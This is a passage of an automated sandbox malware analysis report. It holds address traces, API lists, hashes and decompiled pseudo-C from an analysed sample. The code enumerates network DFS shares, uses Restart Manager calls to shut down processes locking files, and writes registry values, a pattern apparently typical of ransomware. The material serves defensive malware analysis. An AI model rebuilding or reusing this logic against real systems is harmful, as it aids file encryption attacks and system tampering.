0x0135f4e3
0x0135f4e8
0x0135f5a2
0x0135f5a9
0x0135f5aa
0x0135f5ad
0x0135f5af
0x0135f753
0x0135f755
0x00000000
0x0135f757
0x0135f757
0x0135f75a
0x0135f769
0x0135f76d
0x0135f76e
0x0135f76e
0x00000000
0x0135f772
0x0135f5b5
0x0135f5b7
0x0135f5bd
0x0135f5c0
0x0135f5cc
0x0135f5d5
0x0135f5e0
0x0135f5e5
0x0135f5e8
0x0135f5eb
0x00000000
0x0135f5f1
0x0135f5f1
0x00000000
0x0135f5f1
0x0135f5eb
0x0135f4ee
0x0135f4fd
0x0135f4fe
0x0135f501
0x0135f504
0x0135f509
0x0135f71f
0x0135f721
0x0135f723
0x0135f725
0x0135f72f
0x0135f737
0x0135f739
0x0135f73a
0x0135f73e
0x0135f741
0x0135f741
0x0135f745
0x0135f745
0x0135f745
0x0135f748
0x0135f748
0x0135f748
0x0135f74a
0x0135f74a
0x0135f74e
0x0135f50f
0x0135f50f
0x0135f512
0x0135f514
0x0135f517
0x0135f51a
0x0135f51e
0x0135f51f
0x0135f523
0x0135f526
0x0135f52b
0x0135f535
0x0135f53a
0x0135f53d
0x0135f540
0x0135f540
0x0135f543
0x0135f546
0x0135f548
0x0135f551
0x0135f555
0x0135f556
0x0135f55a
0x0135f560
0x0135f569
0x0135f576
0x0135f57d
0x0135f581
0x0135f58c
0x0135f591
0x0135f597
0x00000000
0x0135f59d
0x0135f5f4
0x0135f5f5
0x0135f678
0x0135f67f
0x0135f687
0x0135f68f
0x0135f694
0x0135f697
0x0135f69c
0x00000000
0x0135f6a2
0x0135f6b7
0x0135f797
0x0135f79d
0x00000000
0x0135f6bd
0x0135f6c6
0x0135f6c8
0x0135f6ce
0x00000000
0x0135f6d4
0x0135f6d8
0x0135f70e
0x0135f711
0x00000000
0x0135f717
0x0135f717
0x00000000
0x0135f717
0x0135f6da
0x0135f6dc
0x0135f6de
0x0135f6f7
0x00000000
0x0135f6fd
0x0135f701
0x00000000
0x0135f707
0x0135f707
0x0135f70a
0x0135f70b
0x00000000
0x0135f70b
0x0135f701
0x0135f6f7
0x0135f6d8
0x0135f6ce
0x0135f6b7
0x0135f69c
0x0135f597
0x0135f509
0x00000000
0x0135f5f9
0x0135f5f9
0x0135f5fd
0x0135f600
0x0135f622
0x0135f625
0x0135f62a
0x0135f62e
0x0135f632
0x0135f660
0x0135f662
0x00000000
0x0135f634
0x0135f634
0x0135f634
0x0135f637
0x0135f63a
0x0135f63d
0x0135f774
0x0135f777
0x0135f784
0x0135f78f
0x0135f794
0x00000000
0x0135f643
0x0135f64a
0x0135f64f
0x0135f652
0x0135f655
0x00000000
0x0135f65b
0x0135f65b
0x00000000
0x0135f65b
0x0135f655
0x0135f63d
0x0135f602
0x0135f609
0x0135f60e
0x0135f614
0x0135f616
0x0135f61d
0x0135f663
0x0135f666
0x0135f667
0x0135f66c
0x0135f66f
0x0135f672
0x00000000
0x00000000
0x00000000
0x00000000
0x0135f672
0x00000000
0x0135f600
0x0135f49b
0x0135f7a3
0x0135f7a3
0x0135f7a5
0x0135f7a8
0x0135f7a8
0x0135f7a8
0x0135f7a8
0x0135f7ba
0x0135f7bc
0x0135f7bd
0x0135f7be
0x0135f7c0
0x0135f7c8

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 0135F465
__fassign.LIBCMT ref: 0135F64A
__fassign.LIBCMT ref: 0135F667
WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0135F6AF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0135F6EF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0135F797

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: d2bca8930e689b105abe84cef23d6813f74d04c6e4feb60d532562edafeae5a5
Instruction ID: 6c1ef72ff5fce6c6ed57cae549c08344b71397d4ac28cf487559e9dbbc0f3e1a
Opcode Fuzzy Hash: d2bca8930e689b105abe84cef23d6813f74d04c6e4feb60d532562edafeae5a5
Instruction Fuzzy Hash: 18C19C75D002599FCB15CFE8C8809EDFFB9AF48718F28416AE855FB241E631A946CF60

Uniqueness

Uniqueness Score: -1.00%

Function 012F7710, Relevance: 9.3, APIs: 6, Instructions: 280
networkCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E012F7710(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v52;
				char _v1080;
				char _v1084;
				short* _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				signed int _v1104;
				intOrPtr _v1108;
				short _v1124;
				signed int _v1128;
				char _v1132;
				char _v1148;
				intOrPtr _v1160;
				short _v1162;
				char _v1164;
				void* _v1168;
				intOrPtr* _v1172;
				intOrPtr _v1176;
				intOrPtr* _v1180;
				intOrPtr _v1184;
				char _v1188;
				char _v1204;
				short _v1208;
				char _v1212;
				char _v1228;
				signed int _v1232;
				char _v1236;
				short _v1252;
				void* __esi;
				void* __ebp;
				signed int _t118;
				signed int _t119;
				char _t121;
				void** _t124;
				signed int _t128;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t147;
				short _t148;
				intOrPtr _t153;
				short* _t156;
				signed int _t157;
				intOrPtr _t166;
				intOrPtr _t184;
				intOrPtr* _t187;
				intOrPtr _t194;
				short* _t197;
				void* _t199;
				intOrPtr* _t202;
				char _t204;
				void* _t207;
				intOrPtr* _t210;
				signed int _t211;
				void* _t212;
				void* _t213;

				_t163 = __ebx;
				_push(0xffffffff);
				_push(0x1365781);
				_push( *[fs:0x0]);
				_t213 = _t212 - 0x4e4;
				_t118 =  *0x13a4018; // 0x39cca9f6
				_t119 = _t118 ^ _t211;
				_v20 = _t119;
				_push(__edi);
				_push(_t119);
				 *[fs:0x0] =  &_v16;
				_t202 = _a4;
				asm("xorps xmm0, xmm0");
				_t193 = _a8;
				asm("movq [ebp-0x440], xmm0");
				_v1084 = 0;
				_v1180 = _t202;
				_v1172 = _t202;
				_v1092 = 0;
				_v1088 = 0;
				_v1084 = 0;
				_v8 = 0;
				_t121 = 0;
				_v1168 = 0;
				_v1096 = 0;
				_v1100 = 0;
				_v1132 = 0;
				_v1128 = 7;
				_v1148 = 0;
				_v8 = 1;
				if( *((intOrPtr*)(_a8 + 0x10)) == 0) {
					L16:
					asm("movups xmm1, [ebp-0x478]");
				} else {
					asm("movlpd [ebp-0x480], xmm0");
					_v1164 = 2;
					_t147 = E012F6850(__ebx,  &_v1228, _t193, _t202);
					if( *((intOrPtr*)(_t147 + 0x14)) >= 0x10) {
						_t147 =  *_t147;
					}
					__imp__#11(_t147);
					_v1160 = _t147;
					_t148 = _v1208;
					if(_t148 >= 0x10) {
						_push(_t148 + 1);
						_t148 = E012F56A0(_t163, _t202, _v1228);
						_t213 = _t213 + 8;
					}
					_v1212 = 0;
					_v1208 = 0xf;
					_v1228 = 0;
					__imp__#9(0x6987);
					_v1162 = _t148;
					E013478D0(_t202,  &_v1080, 0, 0x401);
					_t213 = _t213 + 0xc;
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x30], xmm0");
					_t121 =  &_v1164;
					asm("movups [ebp-0x20], xmm0");
					__imp__getnameinfo(_t121, 0x10,  &_v1080, 0x401,  &_v52, 0x20, 8);
					if(_t121 != 0) {
						goto L16;
					} else {
						_t187 =  &_v1080;
						_v1188 = _t121;
						_v1184 = 0xf;
						_t199 = _t187 + 1;
						_v1204 = _t121;
						do {
							_t153 =  *_t187;
							_t187 = _t187 + 1;
						} while (_t153 != 0);
						_push(_t187 - _t199);
						E012F7F00(_t163,  &_v1204, _t199, _t202,  &_v1080);
						_v8 = 2;
						_t156 = E012F6730(_t163,  &_v1252,  &_v1204, _t202);
						if( &_v1148 == _t156) {
							asm("movups xmm0, [ebp-0x478]");
							asm("movups [ebp-0x4f0], xmm0");
						} else {
							asm("movups xmm0, [eax]");
							asm("movups [ebp-0x4f0], xmm0");
							asm("movq xmm0, [eax+0x10]");
							asm("movq [ebp-0x468], xmm0");
							 *((intOrPtr*)(_t156 + 0x10)) = 0;
							 *(_t156 + 0x14) = 7;
							 *_t156 = 0;
						}
						_t157 = _v1232;
						if(_t157 >= 8) {
							_push(2 + _t157 * 2);
							E012F56A0(_t163, _t202, _v1252);
							_t213 = _t213 + 8;
						}
						_v1236 = 0;
						_v1252 = 0;
						_t121 = _v1184;
						_v1232 = 7;
						if(_t121 >= 0x10) {
							_push(_t121 + 1);
							_t121 = E012F56A0(_t163, _t202, _v1204);
							_t213 = _t213 + 8;
						}
						asm("movups xmm1, [ebp-0x4f0]");
						_v1188 = 0;
						_v1184 = 0xf;
						_v1204 = 0;
					}
				}
				asm("movq xmm0, [ebp-0x468]");
				asm("movups [ebp-0x460], xmm1");
				asm("movq [ebp-0x450], xmm0");
				asm("movd eax, xmm1");
				_v8 = 3;
				_t165 =  >=  ? _t121 :  &_v1124;
				_t124 =  &_v1168;
				__imp__NetDfsEnum( >=  ? _t121 :  &_v1124, 0x12c, 0xffffffff, _t124,  &_v1096,  &_v1100);
				if(_t124 == 0) {
					do {
						_t204 = 1;
						if(_v1096 >= 1) {
							_t197 = _v1088;
							_t210 = _v1168 + 4;
							do {
								if(_t197 == _v1084) {
									_push(_t210);
									E012F84E0(_t163,  &_v1092, _t204, _t197);
									_t197 = _v1088;
								} else {
									_t142 =  *_t210;
									 *_t197 = 0;
									 *((intOrPtr*)(_t197 + 0x10)) = 0;
									_v1172 = _t142;
									_t71 = _t142 + 2; // 0x2
									 *((intOrPtr*)(_t197 + 0x10)) = 0;
									 *(_t197 + 0x14) = 7;
									_v1176 = _t71;
									do {
										_t184 =  *_t142;
										_t142 = _t142 + 2;
									} while (_t184 != 0);
									_push(_t142 - _v1176 >> 1);
									E012F51B0(_t163, _t197, _t204, _t210, _v1172);
									_t197 = _v1088 + 0x18;
									_v1088 = _t197;
								}
								_t204 = _t204 + 1;
								_t210 = _t210 + 8;
							} while (_t204 <= _v1096);
						}
						NetApiBufferFree(_v1168);
						_t140 =  >=  ? _v1124 :  &_v1124;
						__imp__NetDfsEnum(_t140, 3, 0xffffffff,  &_v1168,  &_v1096,  &_v1100);
					} while (_t140 == 0);
					_t202 = _v1180;
				}
				_t166 = 0;
				 *_t202 = _v1092;
				_t194 = 0;
				 *((intOrPtr*)(_t202 + 4)) = _v1088;
				 *((intOrPtr*)(_t202 + 8)) = _v1084;
				_t128 = _v1104;
				_v1092 = 0;
				_v1088 = 0;
				_v1084 = 0;
				if(_t128 >= 8) {
					_push(2 + _t128 * 2);
					E012F56A0(_t163, _t202, _v1124);
					_t194 = _v1088;
					_t213 = _t213 + 8;
					_t166 = _v1092;
				}
				_v1108 = 0;
				_v1104 = 7;
				_v1124 = 0;
				if(_t166 != 0) {
					_push(_t166);
					E012F5650(_t166, _t194);
					_push((0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2) + ((0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2)) * 2 << 3);
					E012F56A0(_t163, _t202, _v1092);
				}
				 *[fs:0x0] = _v16;
				_pop(_t207);
				return E0132EA79(_v20 ^ _t211, _t207);
			}

0x012f7710
0x012f7713
0x012f7715
0x012f7720
0x012f7721
0x012f7727
0x012f772c
0x012f772e
0x012f7732
0x012f7733
0x012f7737
0x012f773d
0x012f7740
0x012f7743
0x012f7746
0x012f774e
0x012f7758
0x012f775e
0x012f7764
0x012f776e
0x012f7778
0x012f7782
0x012f778e
0x012f7790
0x012f779a
0x012f77a4
0x012f77ae
0x012f77b8
0x012f77be
0x012f77c5
0x012f77cc
0x012f79b8
0x012f79b8
0x012f77d2
0x012f77d7
0x012f77e5
0x012f77ec
0x012f77f5
0x012f77f7
0x012f77f7
0x012f77fa
0x012f7800
0x012f7806
0x012f780f
0x012f7812
0x012f7819
0x012f781e
0x012f781e
0x012f7826
0x012f7830
0x012f783a
0x012f7841
0x012f784c
0x012f785c
0x012f7861
0x012f7867
0x012f786a
0x012f7881
0x012f7888
0x012f788c
0x012f7894
0x00000000
0x012f789a
0x012f789a
0x012f78a0
0x012f78a6
0x012f78b0
0x012f78b3
0x012f78c0
0x012f78c0
0x012f78c2
0x012f78c3
0x012f78cf
0x012f78d7
0x012f78e2
0x012f78ec
0x012f78f9
0x012f792d
0x012f7934
0x012f78fb
0x012f78fb
0x012f7900
0x012f7907
0x012f790c
0x012f791a
0x012f7921
0x012f7928
0x012f7928
0x012f793b
0x012f7944
0x012f794d
0x012f7954
0x012f7959
0x012f7959
0x012f795e
0x012f7968
0x012f796f
0x012f7975
0x012f7982
0x012f7985
0x012f798c
0x012f7991
0x012f7991
0x012f7994
0x012f799b
0x012f79a5
0x012f79af
0x012f79af
0x012f7894
0x012f79bf
0x012f79c7
0x012f79ce
0x012f79d6
0x012f79e3
0x012f79e7
0x012f79f8
0x012f7a07
0x012f7a0f
0x012f7a15
0x012f7a15
0x012f7a20
0x012f7a2c
0x012f7a32
0x012f7a35
0x012f7a3b
0x012f7aa2
0x012f7aaa
0x012f7aaf
0x012f7a3d
0x012f7a3d
0x012f7a41
0x012f7a44
0x012f7a4b
0x012f7a51
0x012f7a54
0x012f7a5b
0x012f7a62
0x012f7a70
0x012f7a70
0x012f7a73
0x012f7a76
0x012f7a85
0x012f7a8c
0x012f7a97
0x012f7a9a
0x012f7a9a
0x012f7ab5
0x012f7ab6
0x012f7ab9
0x012f7a35
0x012f7acb
0x012f7af5
0x012f7aff
0x012f7b05
0x012f7b0d
0x012f7b0d
0x012f7b19
0x012f7b1b
0x012f7b1d
0x012f7b25
0x012f7b2e
0x012f7b31
0x012f7b37
0x012f7b3d
0x012f7b43
0x012f7b4c
0x012f7b55
0x012f7b5c
0x012f7b61
0x012f7b67
0x012f7b6a
0x012f7b6a
0x012f7b72
0x012f7b7c
0x012f7b86
0x012f7b8f
0x012f7b91
0x012f7b92
0x012f7bbc
0x012f7bbe
0x012f7bc3
0x012f7bcb
0x012f7bd4
0x012f7be2

APIs

inet_addr.WS2_32(00000000), ref: 012F77FA
htons.WS2_32(00006987), ref: 012F7841
getnameinfo.WS2_32(?,00000010,?,00000401,?,00000020,00000008), ref: 012F788C
NetDfsEnum.NETAPI32(?,0000012C,000000FF,00000000,00000000,00000000,39CCA9F6,?,?), ref: 012F7A07
NetApiBufferFree.NETAPI32(00000000), ref: 012F7ACB
NetDfsEnum.NETAPI32(?,00000003,000000FF,00000000,00000000,00000000), ref: 012F7AFF

Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 012F6898
Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 012F68E1

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ByteCharEnumMultiWide$BufferFreegetnameinfohtonsinet_addr
String ID:
API String ID: 3609616093-0
Opcode ID: 4f3998bc074f3c518fae6c65fb8adff997ac594d59314ed7755bd3632af2fe95
Instruction ID: ffacb72c923d49be33a6fee166fd98f159a1d2c90fc58aebe517b73c0d5ed2da
Opcode Fuzzy Hash: 4f3998bc074f3c518fae6c65fb8adff997ac594d59314ed7755bd3632af2fe95
Instruction Fuzzy Hash: 37D118B1D102298AEB24CF14CC44BAEB7B4BF55304F4442E9D60DA7241EB75AB88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 012F8D60, Relevance: 9.3, APIs: 6, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E012F8D60(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr* _v28;
				signed int _v40;
				char _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				void* __esi;
				void* __ebp;
				signed int _t86;
				signed int _t92;
				signed int _t93;
				signed int _t97;
				intOrPtr _t98;
				signed int _t102;
				signed int _t104;
				unsigned int _t106;
				void* _t107;
				char _t111;
				void* _t137;
				intOrPtr* _t138;
				char _t140;
				signed int _t151;
				intOrPtr _t157;
				signed int _t166;
				unsigned int _t169;
				intOrPtr* _t176;
				signed int _t177;
				intOrPtr _t182;
				intOrPtr* _t183;
				void* _t184;
				signed int _t185;
				signed int _t187;
				void* _t188;
				signed int _t193;
				signed int _t194;
				void* _t195;
				void* _t196;
				void* _t202;

				_t137 = __ebx;
				_push(__ebx);
				_t182 = _a4;
				_push(__edi);
				_t176 = __ecx;
				_v20 = _a16;
				_t166 =  *((intOrPtr*)(__ecx + 0x10));
				_v8 = _t166;
				if(0x7ffffffe - _t166 < _t182) {
					E012F4B30(0x7ffffffe, __eflags);
					goto L11;
				} else {
					_t104 = _t166 + _t182;
					_t169 =  *(__ecx + 0x14);
					_v12 = _t104;
					_t187 = _t104 | 0x00000007;
					_v16 = _t169;
					_t202 = _t187 - 0x7ffffffe;
					if(_t202 <= 0) {
						_t106 = _t169 >> 1;
						__eflags = _t169 - 0x7ffffffe - _t106;
						if(_t169 <= 0x7ffffffe - _t106) {
							_t107 = _t106 + _t169;
							__eflags = _t187 - _t107;
							_t182 =  <  ? _t107 : _t187;
						} else {
							_t182 = 0x7ffffffe;
						}
					} else {
						_t182 = 0x7ffffffe;
					}
					_t156 =  ~(_t202 > 0) | _t182 + 0x00000001;
					if(( ~(_t202 > 0) | _t182 + 0x00000001) > 0x7fffffff) {
						L11:
						E012F4A60();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t193 = _t194;
						_t195 = _t194 - 0x5c;
						_t86 =  *0x13a4018; // 0x39cca9f6
						_v40 = _t86 ^ _t193;
						_push(_t182);
						_t183 = _v28;
						__eflags =  *(_t183 + 0x10);
						if( *(_t183 + 0x10) != 0) {
							_v84 = 0xffffffff;
							E013478D0(_t176,  &_v80, 0, 0x42);
							_t196 = _t195 + 0xc;
							_t92 =  &_v84;
							__imp__RmStartSession(_t92, 0,  &_v80);
							__eflags = _t92;
							if(_t92 == 0) {
								__eflags =  *((intOrPtr*)(_t183 + 0x14)) - 8;
								if( *((intOrPtr*)(_t183 + 0x14)) >= 8) {
									_t183 =  *_t183;
								}
								_t93 =  &_v100;
								_v100 = _t183;
								__imp__RmRegisterResources(_v84, 1, _t93, 0, 0, 0, 0);
								__eflags = _t93;
								if(_t93 == 0) {
									_push(_t137);
									_t138 = __imp__RmGetList;
									_push(_t176);
									_t177 = 0;
									_t185 = 0;
									__eflags = 0;
									_v96 = 0;
									_v88 = 0;
									_v92 = 0;
									while(1) {
										_t97 =  *_t138(_v84,  &_v88,  &_v96, _t185,  &_v92);
										__eflags = _t97;
										if(_t97 == 0) {
											break;
										}
										__eflags = _t97 - 0xea;
										if(_t97 == 0xea) {
											_t100 = _v88;
											_v96 = _v88;
											__eflags = _t185;
											if(__eflags != 0) {
												L0132ECE6(_t185);
												_t100 = _v96;
												_t196 = _t196 + 4;
											}
											_t102 = E0132ECEB(_t185, __eflags,  ~(0 | __eflags > 0x00000000) | _t100 * 0x0000029c);
											_t151 = _t177;
											_t196 = _t196 + 4;
											_t177 = _t177 + 1;
											_t185 = _t102;
											__eflags = _t151 - 3;
											if(_t151 < 3) {
												continue;
											} else {
												L26:
												__eflags = _t185;
												if(_t185 != 0) {
													L0132ECE6(_t185);
												}
												_t98 = _v84;
												__eflags = _t98 - 0xffffffff;
												if(_t98 != 0xffffffff) {
													__imp__RmEndSession(_t98);
												}
											}
										}
										goto L31;
									}
									__eflags = _v92;
									if(_v92 == 0) {
										__imp__RmShutdown(_v84, 0, 0);
									}
									goto L26;
								}
							}
						}
						L31:
						__eflags = _v12 ^ _t193;
						_pop(_t184);
						return E0132EA79(_v12 ^ _t193, _t184);
					} else {
						_t111 = E012F57D0(_t137, _t169, _t176, _t156 + _t156);
						_t157 = _a12;
						_t140 = _t111;
						_v8 = _v8 - _t157;
						 *((intOrPtr*)(_t176 + 0x10)) = _v12;
						 *((intOrPtr*)(_t176 + 0x14)) = _t182;
						_t188 = _t157 + _t157;
						_v24 = _t140;
						_v12 = _t157 + _a20 + _t157 + _a20;
						if(_v16 < 8) {
							E01345ED0(_t140, _t176, _t188);
							E01345ED0(_t188 + _t140, _v20, _a20 + _a20);
							__eflags = _v12 + _t140;
							E01345ED0(_v12 + _t140, _t188 + _t176, 2 + _v8 * 2);
							E012F5760(_t176,  &_v24);
							return _t176;
						} else {
							E01345ED0(_t140,  *_t176, _t157 + _t157);
							E01345ED0(_a12 + _a12 + _t140, _v20, _a20 + _a20);
							E01345ED0(_v12 + _t140, _a12 + _a12 +  *_t176, 2 + _v8 * 2);
							_push(2 + _v16 * 2);
							E012F56A0(_t140, _t176,  *_t176);
							 *_t176 = _t140;
							return _t176;
						}
					}
				}
			}

0x012f8d60
0x012f8d69
0x012f8d6b
0x012f8d6e
0x012f8d6f
0x012f8d71
0x012f8d7b
0x012f8d80
0x012f8d85
0x012f8ebc
0x00000000
0x012f8d8b
0x012f8d8b
0x012f8d8e
0x012f8d93
0x012f8d96
0x012f8d99
0x012f8d9c
0x012f8d9e
0x012f8da6
0x012f8daa
0x012f8dac
0x012f8db5
0x012f8db7
0x012f8db9
0x012f8dae
0x012f8dae
0x012f8dae
0x012f8da0
0x012f8da0
0x012f8da0
0x012f8dc8
0x012f8dd0
0x012f8ec1
0x012f8ec1
0x012f8ec6
0x012f8ec7
0x012f8ec8
0x012f8ec9
0x012f8eca
0x012f8ecb
0x012f8ecc
0x012f8ecd
0x012f8ece
0x012f8ecf
0x012f8ed1
0x012f8ed3
0x012f8ed6
0x012f8edd
0x012f8ee0
0x012f8ee1
0x012f8ee4
0x012f8ee8
0x012f8ef3
0x012f8efd
0x012f8f02
0x012f8f0b
0x012f8f0f
0x012f8f15
0x012f8f17
0x012f8f1d
0x012f8f21
0x012f8f23
0x012f8f23
0x012f8f2d
0x012f8f30
0x012f8f39
0x012f8f3f
0x012f8f41
0x012f8f47
0x012f8f48
0x012f8f4e
0x012f8f4f
0x012f8f51
0x012f8f51
0x012f8f53
0x012f8f56
0x012f8f59
0x012f8f60
0x012f8f70
0x012f8f72
0x012f8f74
0x00000000
0x00000000
0x012f8f76
0x012f8f7b
0x012f8f7d
0x012f8f80
0x012f8f83
0x012f8f85
0x012f8f88
0x012f8f8d
0x012f8f90
0x012f8f90
0x012f8fa4
0x012f8fa9
0x012f8fab
0x012f8fae
0x012f8faf
0x012f8fb1
0x012f8fb4
0x00000000
0x012f8fb6
0x012f8fcb
0x012f8fcb
0x012f8fcd
0x012f8fd0
0x012f8fd5
0x012f8fd8
0x012f8fdb
0x012f8fde
0x012f8fe1
0x012f8fe1
0x012f8fde
0x012f8fb4
0x00000000
0x012f8fe8
0x012f8fb8
0x012f8fbc
0x012f8fc5
0x012f8fc5
0x00000000
0x012f8fbc
0x012f8f41
0x012f8f17
0x012f8fe9
0x012f8fec
0x012f8fee
0x012f8ff7
0x012f8dd6
0x012f8dda
0x012f8ddf
0x012f8de2
0x012f8dea
0x012f8ded
0x012f8df3
0x012f8df6
0x012f8df9
0x012f8e05
0x012f8e08
0x012f8e72
0x012f8e85
0x012f8e93
0x012f8e9f
0x012f8ea9
0x012f8eb9
0x012f8e0a
0x012f8e12
0x012f8e2a
0x012f8e49
0x012f8e58
0x012f8e5a
0x012f8e62
0x012f8e6c
0x012f8e6c
0x012f8e08
0x012f8dd0

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 012F8EC1
RmStartSession.RSTRTMGR(FFFFFFFF,00000000,?,?,?,?), ref: 012F8F0F
RmRegisterResources.RSTRTMGR(FFFFFFFF,00000001,?,00000000,00000000,00000000,00000000,?,?,?), ref: 012F8F39
RmGetList.RSTRTMGR(FFFFFFFF,?,?,00000000,?,?,?,?,?,?), ref: 012F8F70

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_taskListRegisterResourcesSessionStart
String ID:
API String ID: 2267271149-0
Opcode ID: c3984a7bd4bcefb70691e53b99f56880885f09e4f8df7b2ad0a6d12b16fa951c
Instruction ID: c96ad574894d5b9abd3b204357dfeb3f836631072f559e814455409a78c2a177
Opcode Fuzzy Hash: c3984a7bd4bcefb70691e53b99f56880885f09e4f8df7b2ad0a6d12b16fa951c
Instruction Fuzzy Hash: D581AF71A1021AAFDB24DFA8DC80AAEF7B9FF54314F54423DE605E7240E770AA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012FA2D0, Relevance: 9.1, APIs: 6, Instructions: 139
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012FA2D0(void* __ebx, void* __eflags) {
				int _v8;
				char _v16;
				void* _v20;
				char _v24;
				signed int _v28;
				int _v32;
				short _v48;
				signed int _v52;
				int _v56;
				short _v72;
				signed int _v76;
				char _v96;
				signed int _v100;
				char _v120;
				void* __ebp;
				signed int _t53;
				short* _t57;
				signed int _t58;
				signed int _t60;
				short* _t62;
				signed int _t63;
				signed int _t65;
				void* _t81;
				void* _t94;
				short* _t96;
				short* _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t103 = __eflags;
				_t81 = __ebx;
				_push(0xffffffff);
				_push(0x13659c5);
				_push( *[fs:0x0]);
				_t101 = _t100 - 0x68;
				_t53 =  *0x13a4018; // 0x39cca9f6
				_push(_t53 ^ _t99);
				 *[fs:0x0] =  &_v16;
				_t96 = E012F93F0( &_v96, 0x13a4e84, _t94, __eflags);
				_v8 = 0;
				_t57 = E012F93F0( &_v48, 0x13a504c, _t94, _t103);
				_v24 = 0;
				_v20 = 0x80000002;
				if(_t57[8] == 0 || _t96[8] == 0) {
					L8:
					_t58 = _v28;
					if(_t58 >= 8) {
						_push(2 + _t58 * 2);
						E012F56A0(_t81, _t94, _v48);
						_t101 = _t101 + 8;
					}
					_v8 = 0xffffffff;
					_v48 = 0;
					_t60 = _v76;
					_v32 = 0;
					_v28 = 7;
					_t110 = _t60 - 8;
					if(_t60 >= 8) {
						_push(2 + _t60 * 2);
						E012F56A0(_t81, _t94, _v96);
						_t101 = _t101 + 8;
					}
					_t97 = E012F93F0( &_v120, 0x13a50c4, _t94, _t110);
					_v8 = 1;
					_t62 = E012F93F0( &_v72, 0x13a504c, _t94, _t110);
					_v24 = 0;
					_v20 = 0x80000002;
					if(_t62[8] != 0 && _t97[8] != 0) {
						if(_t62[0xa] >= 8) {
							_t62 =  *_t62;
						}
						if(RegOpenKeyExW(0x80000002, _t62, 0, 0xf003f,  &_v20) == 0) {
							if(_t97[0xa] >= 8) {
								_t97 =  *_t97;
							}
							RegSetValueExW(_v20, _t97, 0, 4,  &_v24, 4);
							RegCloseKey(_v20);
						}
					}
					_t63 = _v52;
					if(_t63 >= 8) {
						_push(2 + _t63 * 2);
						E012F56A0(_t81, _t94, _v72);
						_t101 = _t101 + 8;
					}
					_v56 = 0;
					_v72 = 0;
					_t65 = _v100;
					_v52 = 7;
					if(_t65 >= 8) {
						_push(2 + _t65 * 2);
